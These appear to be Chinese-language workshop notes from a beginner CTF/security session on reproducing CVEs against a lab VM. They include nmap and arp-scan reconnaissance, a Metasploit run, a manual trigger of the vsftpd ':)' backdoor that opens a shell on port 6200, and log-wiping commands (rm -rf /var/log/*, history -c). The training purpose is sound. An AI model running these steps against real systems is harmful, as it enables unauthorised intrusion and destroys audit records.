# NCtfU - 10/22 (資安小白也能輕鬆復現CVE Vava) (線上) ###### tags: `新手場` `nctfu2024fall` :::success [toc] ::: :::info 講者 Vava ::: ### 錄影連結 ### 講者簡報 [簡報](https://drive.google.com/file/d/1fvKEfadGsfH14-2LUw1aO6dszMOkK_q-/view?usp=sharing) ## 共筆 - 掃ip - arp-scan -l 192.168.199.0/24 - netdiscover 192.168.199.0/24 - nmap -sP 192.168.199.0/24 - 掃port - nmap -A 192.168.199.129 - 看有 ftp 沒有已知漏洞 - nmap -p 21 --script ftp-vsftpd-backdoor 192.168.199.129 - 找 exploit - msfconsole - cve detail - github ### lab1: msfconsole 1. search 2. use 3. options 4. set RHOST 192.168.199.129 5. run 6. get shell !!! - 清除軌跡 - rm -rf /var/log/* - history -c ### lab2: 惡魔微笑 1. nc -v 192.168.199.129 21 2. user xxxx:) 3. pass xxxx 4. 切到其他terminal 5. nc -v 192.168.199.129 6200 6. get shell !!!